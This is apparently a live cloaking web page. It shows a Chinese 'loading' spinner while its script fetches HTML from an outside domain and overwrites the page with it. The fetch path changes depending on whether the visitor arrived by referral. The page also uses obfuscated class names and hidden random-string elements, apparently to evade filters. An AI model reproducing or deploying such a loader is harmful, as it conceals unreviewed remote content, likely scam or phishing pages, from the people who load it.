<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .M7m4GgwfAeA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .M7m4GgwfAeA .NWH53Xok8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .M7m4GgwfAeA .content {
            line-height: 50px;
            text-align: center
        }

        .M7m4GgwfAeA .img {
            width: 100%
        }

        .M7m4GgwfAeA .GHoVzMwBoiT {
            text-align: center
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .M7m4GgwfAeA .GHoVzMwBoiT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .M7m4GgwfAeA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qJgiUbIM44U(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lLn6x = qJgiUbIM44U('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lLn6x +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lLn6x +".html?a=share";
		}
		
        ChpU5B=url+"#"+new Date().getTime();
        ChpU5B && function() {
            $.get(ChpU5B, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>iJL1S8eJfnXI</p>
<span style='display:none'>LyynjPMte3HZk6lY0JMRNR3NayxnfpM3Q7yarEuFvxWXBI74SjxARWoQ0wuo18Nu5sxTI0vLualqg5W</span>
<li style='display:none' >dgUiz5fQwY2</li>
<a  href='#' style='display:none'>StF1BX1gUtLZADREYVdA2f1EC3VkNFavPpCcXFvEeovPU7CvwYKTjAnBDxwXrh</a><div class="M7m4GgwfAeA">
    <div class="NWH53Xok8">
        <div class="GHoVzMwBoiT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>gTmyI3az9zm82RZm1uQcjIunZ0IYvQ3WLx8U8OLljIQKW85CIPwwWnjiI2OY61tfr2kHdUs3xnsQwMQ3CZKEcqcBnPCf</p>
<ul style='display:none' >L4SbhqfmTw237aolHU4TYNNgQ5lhEt2m0HYbQRxX7RIf5ueAZ6NQ4zTYNORQ9AOqj2</ul>
<a  href='#' style='display:none'>G4j0Vt3AVCaY12KTfhbIrtoSWfUt0csAYnOosX9i3FBtIbJDK6lZMP0wa0ar</a></body>
</html>